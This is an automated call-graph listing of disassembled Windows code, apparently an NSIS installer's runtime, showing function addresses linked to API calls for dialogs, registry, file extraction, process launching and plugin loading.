lstrlenA 5056->5057 5061 4021f7 5056->5061 5059 404f16 25 API calls 5057->5059 5058 404f16 25 API calls 5062 4021ff 5058->5062 5060 402240 SHFileOperationA 5059->5060 5060->5061 5060->5062 5061->5058 5061->5062 4587 405054 4588 405076 GetDlgItem GetDlgItem GetDlgItem 4587->4588 4589 4051ff 4587->4589 4633 403f17 SendMessageA 4588->4633 4591 405207 GetDlgItem CreateThread CloseHandle 4589->4591 4592 40522f 4589->4592 4591->4592 4636 404fe8 OleInitialize 4591->4636 4594 40525d 4592->4594 4595 405245 ShowWindow ShowWindow 4592->4595 4596 40527e 4592->4596 4593 4050e6 4602 4050ed GetClientRect GetSystemMetrics SendMessageA SendMessageA 4593->4602 4597 405265 4594->4597 4598 4052b8 4594->4598 4635 403f17 SendMessageA 4595->4635 4601 403f49 8 API calls 4596->4601 4599 405291 ShowWindow 4597->4599 4600 40526d 4597->4600 4598->4596 4609 4052c5 SendMessageA 4598->4609 4605 4052b1 4599->4605 4606 4052a3 4599->4606 4604 403ebb SendMessageA 4600->4604 4614 40528a 4601->4614 4607 40515b 4602->4607 4608 40513f SendMessageA SendMessageA 4602->4608 4604->4596 4611 403ebb SendMessageA 4605->4611 4610 404f16 25 API calls 4606->4610 4612 405160 SendMessageA 4607->4612 4613 40516e 4607->4613 4608->4607 4609->4614 4615 4052de CreatePopupMenu 4609->4615 4610->4605 4611->4598 4612->4613 4617 403ee2 19 API calls 4613->4617 4616 405d1f 18 API calls 4615->4616 4619 4052ee AppendMenuA 4616->4619 4618 40517e 4617->4618 4622 405187 ShowWindow 4618->4622 4623 4051bb GetDlgItem SendMessageA 4618->4623 4620 40530c GetWindowRect 4619->4620 4621 40531f TrackPopupMenu 4619->4621 4620->4621 4621->4614 4624 40533b 4621->4624 4625 4051aa 4622->4625 4626 40519d ShowWindow 4622->4626 4623->4614 4627 4051e2 SendMessageA SendMessageA 4623->4627 4628 40535a SendMessageA 4624->4628 4634 403f17 SendMessageA 4625->4634 4626->4625 4627->4614 4628->4628 4629 405377 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4628->4629 4631 405399 SendMessageA 4629->4631 4631->4631 4632 4053bb GlobalUnlock SetClipboardData CloseClipboard 4631->4632 4632->4614 4633->4593 4634->4623 4635->4594 4637 403f2e SendMessageA 4636->4637 4638 40500b 4637->4638 4641 401389 2 API calls 4638->4641 4642 405032 4638->4642 4639 403f2e SendMessageA 4640 405044 OleUninitialize 4639->4640 4641->4638 4642->4639 5063 402254 5064 40226e 5063->5064 5065 40225b 5063->5065 5066 405d1f 18 API calls 5065->5066 5067 402268 5066->5067 5068 4054f3 MessageBoxIndirectA 5067->5068 5068->5064 4647 4014d6 4648 402a1d 18 API calls 4647->4648 4649 4014dc Sleep 4648->4649 4651 4028cf 4649->4651 4652 4030d9 SetErrorMode GetVersion 4653 403110 4652->4653 4654 403116 4652->4654 4656 406092 5 API calls 4653->4656 4655 406028 3 API calls 4654->4655 4657 40312c 4655->4657 4656->4654 4658 406028 3 API calls 4657->4658 4659 403136 4658->4659 4660 406028 3 API calls 4659->4660 4661 403140 4660->4661 4662 406092 5 API calls 4661->4662 4663 403147 4662->4663 4664 406092 5 API calls 4663->4664 4665 40314e #17 OleInitialize SHGetFileInfoA 4664->4665 4743 405cfd lstrcpynA 4665->4743 4667 40318b GetCommandLineA 4744 405cfd lstrcpynA 4667->4744 4669 40319d GetModuleHandleA 4670 4031b4 4669->4670 4671 40579a CharNextA 4670->4671 4672 4031c8 CharNextA 4671->4672 4678 4031d8 4672->4678 4673 4032a2 4674 4032b5 GetTempPathA 4673->4674 4745 4030a8 4674->4745 4676 4032cd 4679 4032d1 GetWindowsDirectoryA lstrcatA 4676->4679 4680 403327 DeleteFileA 4676->4680 4677 40579a CharNextA 4677->4678 4678->4673 4678->4677 4684 4032a4 4678->4684 4682 4030a8 12 API calls 4679->4682 4755 402c66 GetTickCount GetModuleFileNameA 4680->4755 4683 4032ed 4682->4683 4683->4680 4686 4032f1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4683->4686 4839 405cfd lstrcpynA 4684->4839 4685 40333b 4687 4033d1 4685->4687 4690 4033c1 4685->4690 4694 40579a CharNextA 4685->4694 4689 4030a8 12 API calls 4686->4689 4842 4035a3 4687->4842 4692 40331f 4689->4692 4783 40367d 4690->4783 4692->4680 4692->4687 4696 403356 4694->4696 4705 403401 4696->4705 4706 40339c 4696->4706 4697 403509 4699 403511 GetCurrentProcess OpenProcessToken 4697->4699 4700 40358b ExitProcess 4697->4700 4698 4033eb 4701 4054f3 MessageBoxIndirectA 4698->4701 4702 40355c 4699->4702 4703 40352c LookupPrivilegeValueA AdjustTokenPrivileges 4699->4703 4707 4033f9 ExitProcess 4701->4707 4710 406092 5 API calls 4702->4710 4703->4702 4709 405476 5 API calls 4705->4709 4708 40585d 18 API calls 4706->4708 4711 4033a7 4708->4711 4712 403406 lstrcatA 4709->4712 4713 403563 4710->4713 4711->4687 4840 405cfd lstrcpynA 4711->4840 4714 403422 lstrcatA lstrcmpiA 4712->4714 4715 403417 lstrcatA 4712->4715 4716 403578 ExitWindowsEx 4713->4716 4719 403584 4713->4719 4714->4687 4718 40343e 4714->4718 4715->4714 4716->4700 4716->4719 4721 403443 4718->4721 4722 40344a 4718->4722 4723 40140b 2 API calls 4719->4723 4720 4033b6 4841 405cfd lstrcpynA 4720->4841 4725 4053dc 4 API calls 4721->4725 4726 405459 2 API calls 4722->4726 4723->4700 4727 403448 4725->4727 4728 40344f SetCurrentDirectoryA 4726->4728 4727->4728 4729 403469 4728->4729 4730 40345e 4728->4730 4850 405cfd lstrcpynA 4729->4850 4849 405cfd lstrcpynA 4730->4849 4733 405d1f 18 API calls 4734 4034a8 DeleteFileA 4733->4734 4735 4034b5 CopyFileA 4734->4735 4740 403477 4734->4740 4735->4740 4736 4034fd 4738 405bb8 38 API calls 4736->4738 4737 405bb8 38 API calls 4737->4740 4738->4687 4739 405d1f 18 API calls 4739->4740 4740->4733 4740->4736 4740->4737 4740->4739 4742 4034e9 CloseHandle 4740->4742 4851 40548e CreateProcessA 4740->4851 4742->4740 4743->4667 4744->4669 4746 405f68 5 API calls 4745->4746 4747 4030b4 4746->4747 4748 4030be 4747->4748 4749 40576f 3 API calls 4747->4749 4748->4676 4750 4030c6 4749->4750 4751 405459 2 API calls 4750->4751 4752 4030cc 4751->4752 4854 40599f 4752->4854 4858 405970 GetFileAttributesA CreateFileA 4755->4858 4757 402ca6 4775 402cb6 4757->4775 4859 405cfd lstrcpynA 4757->4859 4759 402ccc 4760 4057b6 2 API calls 4759->4760 4761 402cd2 4760->4761 4860 405cfd lstrcpynA 4761->4860 4763 402cdd GetFileSize 4768 402cf4 4763->4768 4780 402dd9 4763->4780 4765 402de2 4767 402e12 GlobalAlloc 4765->4767 4765->4775 4873 403091 SetFilePointer 4765->4873 4766 40307b ReadFile 4766->4768 4872 403091 SetFilePointer 4767->4872 4768->4766 4770 402e45 4768->4770 4768->4775 4779 402c02 6 API calls 4768->4779 4768->4780 4772 402c02 6 API calls 4770->4772 4772->4775 4773 402dfb 4776 40307b ReadFile 4773->4776 4774 402e2d 4777 402e9f 36 API calls 4774->4777 4775->4685 4778 402e06 4776->4778 4781 402e39 4777->4781 4778->4767 4778->4775 4779->4768 4861 402c02 4780->4861 4781->4775 4781->4781 4782 402e76 SetFilePointer 4781->4782 4782->4775 4784 406092 5 API calls 4783->4784 4785 403691 4784->4785 4786 403697 4785->4786 4787 4036a9 4785->4787 4887 405c5b wsprintfA 4786->4887 4788 405be4 3 API calls 4787->4788 4789 4036d4 4788->4789 4791 4036f2 lstrcatA 4789->4791 4793 405be4 3 API calls 4789->4793 4792 4036a7 4791->4792 4878 403942 4792->4878 4793->4791 4796 40585d 18 API calls 4797 403724 4796->4797 4798 4037ad 4797->4798 4800 405be4 3 API calls 4797->4800 4799 40585d 18 API calls 4798->4799 4801 4037b3 4799->4801 4802 403750 4800->4802 4803 4037c3 LoadImageA 4801->4803 4804 405d1f 18 API calls 4801->4804 4802->4798 4807 40376c lstrlenA 4802->4807 4811 40579a CharNextA 4802->4811 4805 403869 4803->4805 4806 4037ea RegisterClassA 4803->4806 4804->4803 4810 40140b 2 API calls 4805->4810 4808 403820 SystemParametersInfoA CreateWindowExA 4806->4808 4809 403873 4806->4809 4812 4037a0 4807->4812 4813 40377a lstrcmpiA 4807->4813 4808->4805 4809->4687 4814 40386f 4810->4814 4816 40376a 4811->4816 4815 40576f 3 API calls 4812->4815 4813->4812 4817 40378a GetFileAttributesA 4813->4817 4814->4809 4818 403942 19 API calls 4814->4818 4819 4037a6 4815->4819 4816->4807 4820 403796 4817->4820 4822 403880 4818->4822 4888 405cfd lstrcpynA 4819->4888 4820->4812 4821 4057b6 2 API calls 4820->4821 4821->4812 4824 40388c ShowWindow 4822->4824 4825 40390f 4822->4825 4827 406028 3 API calls 4824->4827 4826 404fe8 5 API calls 4825->4826 4828 403915 4826->4828 4829 4038a4 4827->4829 4830 403931 4828->4830 4831 403919 4828->4831 4832 4038b2 GetClassInfoA 4829->4832 4834 406028 3 API calls 4829->4834 4833 40140b 2 API calls 4830->4833 4831->4809 4837 40140b 2 API calls 4831->4837 4835 4038c6 GetClassInfoA RegisterClassA 4832->4835 4836 4038dc DialogBoxParamA 4832->4836 4833->4809 4834->4832 4835->4836 4838 40140b 2 API calls 4836->4838 4837->4809 4838->4809 4839->4674 4840->4720 4841->4690 4843 4035bb 4842->4843 4844 4035ad CloseHandle 4842->4844 4890 4035e8 4843->4890 4844->4843 4847 40559f 69 API calls 4848 4033da OleUninitialize 4847->4848 4848->4697 4848->4698 4849->4729 4850->4740 4852 4054c1 CloseHandle 4851->4852 4853 4054cd 4851->4853 4852->4853 4853->4740 4855 4059aa GetTickCount GetTempFileNameA 4854->4855 4856 4030d7 4855->4856 4857 4059d7 4855->4857 4856->4676 4857->4855 4857->4856 4858->4757 4859->4759 4860->4763 4862 402c23 4861->4862 4863 402c0b 4861->4863 4864 402c33 GetTickCount 4862->4864 4865 402c2b 4862->4865 4866 402c14 DestroyWindow 4863->4866 4867 402c1b 4863->4867 4869 402c41 CreateDialogParamA ShowWindow 4864->4869 4870 402c64 4864->4870 4874 4060ce 4865->4874 4866->4867 4867->4765 4869->4870 4870->4765 4872->4774 4873->4773 4875 4060eb PeekMessageA 4874->4875 4876 4060e1 DispatchMessageA 4875->4876 4877 402c31 4875->4877 4876->4875 4877->4765 4879 403956 4878->4879 4889 405c5b wsprintfA 4879->4889 4881 4039c7 4882 405d1f 18 API calls 4881->4882 4883 4039d3 SetWindowTextA 4882->4883 4884 403702 4883->4884 4885 4039ef 4883->4885 4884->4796 4885->4884 4886 405d1f 18 API calls 4885->4886 4886->4885 4887->4792 4888->4798 4889->4881 4891 4035f6 4890->4891 4892 4035c0 4891->4892 4893 4035fb FreeLibrary GlobalFree 4891->4893 4892->4847 4893->4892 4893->4893 5069 4042d9 5070 4042e9 5069->5070 5071 40430f 5069->5071 5072 403ee2 19 API calls 5070->5072 5073 403f49 8 API calls 5071->5073 5074 4042f6 SetDlgItemTextA 5072->5074 5075 40431b 5073->5075 5074->5071 5076 1000161a 5077 10001649 5076->5077 5078 10001a5d 18 API calls 5077->5078 5079 10001650 5078->5079 5080 10001663 5079->5080 5081 10001657 5079->5081 5083 1000168a 5080->5083 5084 1000166d 5080->5084 5082 10001266 2 API calls 5081->5082 5087 10001661 5082->5087 5085 10001690 5083->5085 5086 100016b4 5083->5086 5088 100014e2 3 API calls 5084->5088 5090 10001559 3 API calls 5085->5090 5091 100014e2 3 API calls 5086->5091 5089 10001672 5088->5089 5092 10001559 3 API calls 5089->5092 5093 10001695 5090->5093 5091->5087 5094 10001678 5092->5094 5095 10001266 2 API calls 5093->5095 5096 10001266 2 API calls 5094->5096 5097 1000169b GlobalFree 5095->5097 5098 1000167e GlobalFree 5096->5098 5097->5087 5099 100016af GlobalFree 5097->5099 5098->5087 5099->5087 5100 40155b 5101 402877 5100->5101 5104 405c5b wsprintfA 5101->5104 5103 40287c 5104->5103 5105 40255c 5106 402a1d 18 API calls 5105->5106 5112 402566 5106->5112 5107 4025d0 5108 4059e8 ReadFile 5108->5112 5109 4025d2 5114 405c5b wsprintfA 5109->5114 5111 4025e2 5111->5107 5113 4025f8 SetFilePointer 5111->5113 5112->5107 5112->5108 5112->5109 5112->5111 5113->5107 5114->5107 5115 40205e 5116 402a3a 18 API calls 5115->5116 5117 402065 5116->5117 5118 402a3a 18 API calls 5117->5118 5119 40206f 5118->5119 5120 402a3a 18 API calls 5119->5120 5121 402079 5120->5121 5122 402a3a 18 API calls 5121->5122 5123 402083 5122->5123 5124 402a3a 18 API calls 5123->5124 5125 40208d 5124->5125 5126 4020cc CoCreateInstance 5125->5126 5127 402a3a 18 API calls 5125->5127 5130 4020eb 5126->5130 5132 402193 5126->5132 5127->5126 5128 401423 25 API calls 5129 4021c9 5128->5129 5131 402173 MultiByteToWideChar 5130->5131 5130->5132 5131->5132 5132->5128 5132->5129 5133 40265e 5134 402664 5133->5134 5135 402668 FindNextFileA 5134->5135 5137 40267a 5134->5137 5136 4026b9 5135->5136 5135->5137 5139 405cfd lstrcpynA 5136->5139 5139->5137 5140 401cde GetDlgItem GetClientRect 5141 402a3a 18 API calls 5140->5141 5142 401d0e LoadImageA SendMessageA 5141->5142 5143 401d2c DeleteObject 5142->5143 5144 4028cf 5142->5144 5143->5144 5145 401662 5146 402a3a 18 API calls 5145->5146 5147 401669 5146->5147 5148 402a3a 18 API calls 5147->5148 5149 401672 5148->5149 5150 402a3a 18 API calls 5149->5150 5151 40167b MoveFileA 5150->5151 5152 401687 5151->5152 5153 40168e 5151->5153 5154 401423 25 API calls 5152->5154 5155 406001 2 API calls 5153->5155 5157 4021c9 5153->5157 5154->5157 5156 40169d 5155->5156 5156->5157 5158 405bb8 38 API calls 5156->5158 5158->5152 3992 402364 3993 40236a 3992->3993 3994 402a3a 18 API calls 3993->3994 3995 40237c 3994->3995 3996 402a3a 18 API calls 3995->3996 3997 402386 RegCreateKeyExA 3996->3997 3998 4023b0 3997->3998 3999 4026a6 3997->3999 4000 402a3a 18 API calls 3998->4000 4002 4023c8 3998->4002 4003 4023c1 lstrlenA 4000->4003 4001 4023d4 4005 4023ef RegSetValueExA 4001->4005 4009 402e9f 4001->4009 4002->4001 4030 402a1d 4002->4030 4003->4002 4007 402405 RegCloseKey 4005->4007 4007->3999 4011 402eb5 4009->4011 4010 402ee0 4033 40307b 4010->4033 4011->4010 4056 403091 SetFilePointer 4011->4056 4015 403005 4015->4005 4016 40301b 4018 40301f 4016->4018 4022 403037 4016->4022 4017 402efd GetTickCount 4025 402f10 4017->4025 4019 40307b ReadFile 4018->4019 4019->4015 4020 40307b ReadFile 4020->4022 4021 40307b ReadFile 4021->4025 4022->4015 4022->4020 4023 405a17 WriteFile 4022->4023 4023->4022 4025->4015 4025->4021 4026 402f76 GetTickCount 4025->4026 4027 402f9f MulDiv wsprintfA 4025->4027 4036 406195 4025->4036 4054 405a17 WriteFile 4025->4054 4026->4025 4043 404f16 4027->4043 4031 405d1f 18 API calls 4030->4031 4032 402a31 4031->4032 4032->4001 4057 4059e8 ReadFile 4033->4057 4037 4061ba 4036->4037 4038 4061c2 4036->4038 4037->4025 4038->4037 4039 406252 GlobalAlloc 4038->4039 4040 406249 GlobalFree 4038->4040 4041 4062c0 GlobalFree 4038->4041 4042 4062c9 GlobalAlloc 4038->4042 4039->4037 4039->4038 4040->4039 4041->4042 4042->4037 4042->4038 4044 404f31 4043->4044 4053 404fd4 4043->4053 4045 404f4e lstrlenA 4044->4045 4048 405d1f 18 API calls 4044->4048 4046 404f77 4045->4046 4047 404f5c lstrlenA 4045->4047 4050 404f8a 4046->4050 4051 404f7d SetWindowTextA 4046->4051 4049 404f6e lstrcatA 4047->4049 4047->4053 4048->4045 4049->4046 4052 404f90 SendMessageA SendMessageA SendMessageA 4050->4052 4050->4053 4051->4050 4052->4053 4053->4025 4055 405a35 4054->4055 4055->4025 4056->4010 4058 402eeb 4057->4058 4058->4015 4058->4016 4058->4017 4059 401567 4060 401577 ShowWindow 4059->4060 4061 40157e 4059->4061 4060->4061 4062 40158c ShowWindow 4061->4062 4063 4028cf 4061->4063 4062->4063 5166 401dea 5167 402a3a 18 API calls 5166->5167 5168 401df0 5167->5168 5169 402a3a 18 API calls 5168->5169 5170 401df9 5169->5170 5171 402a3a 18 API calls 5170->5171 5172 401e02 5171->5172 5173 402a3a 18 API calls 5172->5173 5174 401e0b 5173->5174 5175 401423 25 API calls 5174->5175 5176 401e12 ShellExecuteA 5175->5176 5177 401e3f 5176->5177 5178 401eee 5179 402a3a 18 API calls 5178->5179 5180 401ef5 5179->5180 5181 406092 5 API calls 5180->5181 5182 401f04 5181->5182 5183 401f1c GlobalAlloc 5182->5183 5184 401f84 5182->5184 5183->5184 5185 401f30 5183->5185 5186 406092 5 API calls 5185->5186 5187 401f37 5186->5187 5188 406092 5 API calls 5187->5188 5189 401f41 5188->5189 5189->5184 5193 405c5b wsprintfA 5189->5193 5191 401f78 5194 405c5b wsprintfA 5191->5194 5193->5191 5194->5184 5195 4014f0 SetForegroundWindow 5196 4028cf 5195->5196 5197 404671 5198 404681 5197->5198 5199 40469d 5197->5199 5208 4054d7 GetDlgItemTextA 5198->5208 5201 4046d0 5199->5201 5202 4046a3 SHGetPathFromIDListA 5199->5202 5204 4046ba SendMessageA 5202->5204 5205 4046b3 5202->5205 5203 40468e SendMessageA 5203->5199 5204->5201 5206 40140b 2 API calls 5205->5206 5206->5204 5208->5203 5209 100015b3 5210 100014bb GlobalFree 5209->5210 5212 100015cb 5210->5212 5211 10001611 GlobalFree 5212->5211 5213 100015e6 5212->5213 5214 100015fd VirtualFree 5212->5214 5213->5211 5214->5211 5220 4018f5 5221 40192c 5220->5221 5222 402a3a 18 API calls 5221->5222 5223 401931 5222->5223 5224 40559f 69 API calls 5223->5224 5225 40193a 5224->5225 5226 403ff6 lstrcpynA lstrlenA 5227 4024f7 5228 402a3a 18 API calls 5227->5228 5229 4024fe 5228->5229 5232 405970 GetFileAttributesA CreateFileA 5229->5232 5231 40250a 5232->5231 5233 4018f8 5234 402a3a 18 API calls 5233->5234 5235 4018ff 5234->5235 5236 4054f3 MessageBoxIndirectA 5235->5236 5237 401908 5236->5237 5252 1000103d 5253 1000101b 5 API calls 5252->5253 5254 10001056 5253->5254 5255 4014fe 5256 401506 5255->5256 5258 401519 5255->5258 5257 402a1d 18 API calls 5256->5257 5257->5258 5259 402b7f 5260 402ba7 5259->5260 5261 402b8e SetTimer 5259->5261 5262 402bfc 5260->5262 5263 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5260->5263 5261->5260 5263->5262 5264 401000 5265 401037 BeginPaint GetClientRect 5264->5265 5266 40100c DefWindowProcA 5264->5266 5267 4010f3 5265->5267 5271 401179 5266->5271 5269 401073 CreateBrushIndirect FillRect DeleteObject 5267->5269 5270 4010fc 5267->5270 5269->5267 5272 401102 CreateFontIndirectA 5270->5272 5273 401167 EndPaint 5270->5273 5272->5273 5274 401112 6 API calls 5272->5274 5273->5271 5274->5273 5282 401b02 5283 402a3a 18 API calls 5282->5283 5284 401b09 5283->5284 5285 402a1d 18 API calls 5284->5285 5286 401b12 wsprintfA 5285->5286 5287 4028cf 5286->5287 5288 402482 5289 402b44 19 API calls 5288->5289 5290 40248c 5289->5290 5291 402a1d 18 API calls 5290->5291 5292 402495 5291->5292 5293 4024b8 RegEnumValueA 5292->5293 5294 4024ac RegEnumKeyA 5292->5294 5296 4026a6 5292->5296 5295 4024d1 RegCloseKey 5293->5295 5293->5296 5294->5295 5295->5296 3931 401a03 3937 402a3a 3931->3937 3934 401a20 3935 401a25 lstrcmpA 3934->3935 3936 401a33 3934->3936 3935->3936 3938 402a46 3937->3938 3943 405d1f 3938->3943 3941 401a0c ExpandEnvironmentStringsA 3941->3934 3941->3936 3948 405d2c 3943->3948 3944 405f4f 3945 402a67 3944->3945 3977 405cfd lstrcpynA 3944->3977 3945->3941 3961 405f68 3945->3961 3947 405dcd GetVersion 3947->3948 3948->3944 3948->3947 3949 405f26 lstrlenA 3948->3949 3952 405d1f 10 API calls 3948->3952 3954 405e45 GetSystemDirectoryA 3948->3954 3955 405e58 GetWindowsDirectoryA 3948->3955 3956 405f68 5 API calls 3948->3956 3957 405e8c SHGetSpecialFolderLocation 3948->3957 3958 405d1f 10 API calls 3948->3958 3959 405ecf lstrcatA 3948->3959 3970 405be4 RegOpenKeyExA 3948->3970 3975 405c5b wsprintfA 3948->3975 3976 405cfd lstrcpynA 3948->3976 3949->3948 3952->3949 3954->3948 3955->3948 3956->3948 3957->3948 3960 405ea4 SHGetPathFromIDListA CoTaskMemFree 3957->3960 3958->3948 3959->3948 3960->3948 3962 405f74 3961->3962 3964 405fd1 CharNextA 3962->3964 3967 405fdc 3962->3967 3968 405fbf CharNextA 3962->3968 3969 405fcc CharNextA 3962->3969 3978 40579a 3962->3978 3963 405fe0 CharPrevA 3963->3967 3964->3962 3964->3967 3965 405ffb 3965->3941 3967->3963 3967->3965 3968->3962 3969->3964 3971 405c55 3970->3971 3972 405c17 RegQueryValueExA 3970->3972 3971->3948 3973 405c38 RegCloseKey 3972->3973 3973->3971 3975->3948 3976->3948 3977->3945 3979 4057a0 3978->3979 3980 4057b3 3979->3980 3981 4057a6 CharNextA 3979->3981 3980->3962 3981->3979 3982 402283 3983 40228b 3982->3983 3988 402291 3982->3988 3984 402a3a 18 API calls 3983->3984 3984->3988 3985 402a3a 18 API calls 3987 4022a1 3985->3987 3986 4022af 3990 402a3a 18 API calls 3986->3990 3987->3986 3989 402a3a 18 API calls 3987->3989 3988->3985 3988->3987 3989->3986 3991 4022b8 WritePrivateProfileStringA 3990->3991 5298 100029c3 5299 100029db 5298->5299 5300 10001534 2 API calls 5299->5300 5301 100029f6 5300->5301 5302 402308 5303 402338 5302->5303 5304 40230d 5302->5304 5305 402a3a 18 API calls 5303->5305 5306 402b44 19 API calls 5304->5306 5308 40233f 5305->5308 5307 402314 5306->5307 5309 402a3a 18 API calls 5307->5309 5312 402355 5307->5312 5313 402a7a RegOpenKeyExA 5308->5313 5310 402325 RegDeleteValueA RegCloseKey 5309->5310 5310->5312 5317 402aa5 5313->5317 5321 402af1 5313->5321 5314 402acb RegEnumKeyA 5315 402add RegCloseKey 5314->5315 5314->5317 5318 406092 5 API calls 5315->5318 5316 402b02 RegCloseKey 5316->5321 5317->5314 5317->5315 5317->5316 5319 402a7a 5 API calls 5317->5319 5320 402aed 5318->5320 5319->5317 5320->5321 5322 402b1d RegDeleteKeyA 5320->5322 5321->5312 5322->5321 5323 402688 5324 402a3a 18 API calls 5323->5324 5325 40268f FindFirstFileA 5324->5325 5326 4026b2 5325->5326 5330 4026a2 5325->5330 5327 4026b9 5326->5327 5331 405c5b wsprintfA 5326->5331 5332 405cfd lstrcpynA 5327->5332 5331->5327 5332->5330 5333 404e8a 5334 404e9a 5333->5334 5335 404eae 5333->5335 5336 404ea0 5334->5336 5345 404ef7 5334->5345 5337 404eb6 IsWindowVisible 5335->5337 5341 404ecd 5335->5341 5339 403f2e SendMessageA 5336->5339 5340 404ec3 5337->5340 5337->5345 5338 404efc CallWindowProcA 5342 404eaa 5338->5342 5339->5342 5346 4047e1 SendMessageA 5340->5346 5341->5338 5351 404861 5341->5351 5345->5338 5347 404840 SendMessageA 5346->5347 5348 404804 GetMessagePos ScreenToClient SendMessageA 5346->5348 5349 404838 5347->5349 5348->5349 5350 40483d 5348->5350 5349->5341 5350->5347 5360 405cfd lstrcpynA 5351->5360 5353 404874 5361 405c5b wsprintfA 5353->5361 5355 40487e 5356 40140b 2 API calls 5355->5356 5357 404887 5356->5357 5362 405cfd lstrcpynA 5357->5362 5359 40488e 5359->5345 5360->5353 5361->5355 5362->5359 5363 401c8a 5364 402a1d 18 API calls 5363->5364 5365 401c90 IsWindow 5364->5365 5366 4019f3 5365->5366 4202 403a0f 4203 403b62 4202->4203 4204 403a27 4202->4204 4206 403bb3 4203->4206 4207 403b73 GetDlgItem GetDlgItem 4203->4207 4204->4203 4205 403a33 4204->4205 4208 403a51 4205->4208 4209 403a3e SetWindowPos 4205->4209 4211 403c0d 4206->4211 4219 401389 2 API calls 4206->4219 4210 403ee2 19 API calls 4207->4210 4212 403a56 ShowWindow 4208->4212 4213 403a6e 4208->4213 4209->4208 4214 403b9d SetClassLongA 4210->4214 4220 403b5d 4211->4220 4272 403f2e 4211->4272 4212->4213 4216 403a90 4213->4216 4217 403a76 DestroyWindow 4213->4217 4218 40140b 2 API calls 4214->4218 4222 403a95 SetWindowLongA 4216->4222 4223 403aa6 4216->4223 4221 403e6b 4217->4221 4218->4206 4224 403be5 4219->4224 4221->4220 4230 403e9c ShowWindow 4221->4230 4222->4220 4227 403ab2 GetDlgItem 4223->4227 4228 403b4f 4223->4228 4224->4211 4229 403be9 SendMessageA 4224->4229 4225 40140b 2 API calls 4243 403c1f 4225->4243 4226 403e6d DestroyWindow EndDialog 4226->4221 4231 403ae2 4227->4231 4232 403ac5 SendMessageA IsWindowEnabled 4227->4232 4291 403f49 4228->4291 4229->4220 4230->4220 4235 403aef 4231->4235 4236 403b02 4231->4236 4237 403b36 SendMessageA 4231->4237 4246 403ae7 4231->4246 4232->4220 4232->4231 4234 405d1f 18 API calls 4234->4243 4235->4237 4235->4246 4240 403b0a 4236->4240 4241 403b1f 4236->4241 4237->4228 4239 403ee2 19 API calls 4239->4243 4285 40140b 4240->4285 4245 40140b 2 API calls 4241->4245 4242 403b1d 4242->4228 4243->4220 4243->4225 4243->4226 4243->4234 4243->4239 4263 403dad DestroyWindow 4243->4263 4275 403ee2 4243->4275 4247 403b26 4245->4247 4288 403ebb 4246->4288 4247->4228 4247->4246 4249 403c9a GetDlgItem 4250 403cb7 ShowWindow KiUserCallbackDispatcher 4249->4250 4251 403caf 4249->4251 4278 403f04 KiUserCallbackDispatcher 4250->4278 4251->4250 4253 403ce1 EnableWindow 4256 403cf5 4253->4256 4254 403cfa GetSystemMenu EnableMenuItem SendMessageA 4255 403d2a SendMessageA 4254->4255 4254->4256 4255->4256 4256->4254 4279 403f17 SendMessageA 4256->4279 4280 405cfd lstrcpynA 4256->4280 4259 403d58 lstrlenA 4260 405d1f 18 API calls 4259->4260 4261 403d69 SetWindowTextA 4260->4261 4281 401389 4261->4281 4263->4221 4264 403dc7 CreateDialogParamA 4263->4264 4264->4221 4265 403dfa 4264->4265 4266 403ee2 19 API calls 4265->4266 4267 403e05 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4266->4267 4268 401389 2 API calls 4267->4268 4269 403e4b 4268->4269 4269->4220 4270 403e53 ShowWindow 4269->4270 4271 403f2e SendMessageA 4270->4271 4271->4221 4273 403f46 4272->4273 4274 403f37 SendMessageA 4272->4274 4273->4243 4274->4273 4276 405d1f 18 API calls 4275->4276 4277 403eed SetDlgItemTextA 4276->4277 4277->4249 4278->4253 4279->4256 4280->4259 4283 401390 4281->4283 4282 4013fe 4282->4243 4283->4282 4284 4013cb MulDiv SendMessageA 4283->4284 4284->4283 4286 401389 2 API calls 4285->4286 4287 401420 4286->4287 4287->4246 4289 403ec2 4288->4289 4290 403ec8 SendMessageA 4288->4290 4289->4290 4290->4242 4292 403f61 GetWindowLongA 4291->4292 4302 403fea 4291->4302 4293 403f72 4292->4293 4292->4302 4294 403f81 GetSysColor 4293->4294 4295 403f84 4293->4295 4294->4295 4296 403f94 SetBkMode 4295->4296 4297 403f8a SetTextColor 4295->4297 4298 403fb2 4296->4298 4299 403fac GetSysColor 4296->4299 4297->4296 4300 403fc3 4298->4300 4301 403fb9 SetBkColor 4298->4301 4299->4298 4300->4302 4303 403fd6 DeleteObject 4300->4303 4304 403fdd CreateBrushIndirect 4300->4304 4301->4300 4302->4220 4303->4304 4304->4302 4305 402410 4316 402b44 4305->4316 4307 40241a 4308 402a3a 18 API calls 4307->4308 4309 402423 4308->4309 4310 40242d RegQueryValueExA 4309->4310 4311 4026a6 4309->4311 4312 402453 RegCloseKey 4310->4312 4313 40244d 4310->4313 4312->4311 4313->4312 4320 405c5b wsprintfA 4313->4320 4317 402a3a 18 API calls 4316->4317 4318 402b5d 4317->4318 4319 402b6b RegOpenKeyExA 4318->4319 4319->4307 4320->4312 4321 401f90 4322 401fa2 4321->4322 4323 402050 4321->4323 4324 402a3a 18 API calls 4322->4324 4325 401423 25 API calls 4323->4325 4326 401fa9 4324->4326 4331 4021c9 4325->4331 4327 402a3a 18 API calls 4326->4327 4328 401fb2 4327->4328 4329 401fc7 LoadLibraryExA 4328->4329 4330 401fba GetModuleHandleA 4328->4330 4329->4323 4332 401fd7 GetProcAddress 4329->4332 4330->4329 4330->4332 4333 402023 4332->4333 4334 401fe6 4332->4334 4335 404f16 25 API calls 4333->4335 4336 402005 4334->4336 4337 401fee 4334->4337 4339 401ff6 4335->4339 4342 100016bd 4336->4342 4384 401423 4337->4384 4339->4331 4340 402044 FreeLibrary 4339->4340 4340->4331 4343 100016ed 4342->4343 4387 10001a5d 4343->4387 4345 100016f4 4346 1000180a 4345->4346 4347 10001705 4345->4347 4348 1000170c 4345->4348 4346->4339 4436 100021b0 4347->4436 4419 100021fa 4348->4419 4353 10001731 4355 10001770 4353->4355 4356 10001752 4353->4356 4354 10001722 4362 10001733 4354->4362 4363 10001728 4354->4363 4358 100017b2 4355->4358 4359 10001776 4355->4359 4449 100023da 4356->4449 4367 100023da 11 API calls 4358->4367 4365 10001559 3 API calls 4359->4365 4360 1000173b 4360->4353 4446 10002aa3 4360->4446 4361 10001758 4460 10001559 4361->4460 4440 10002589 4362->4440 4363->4353 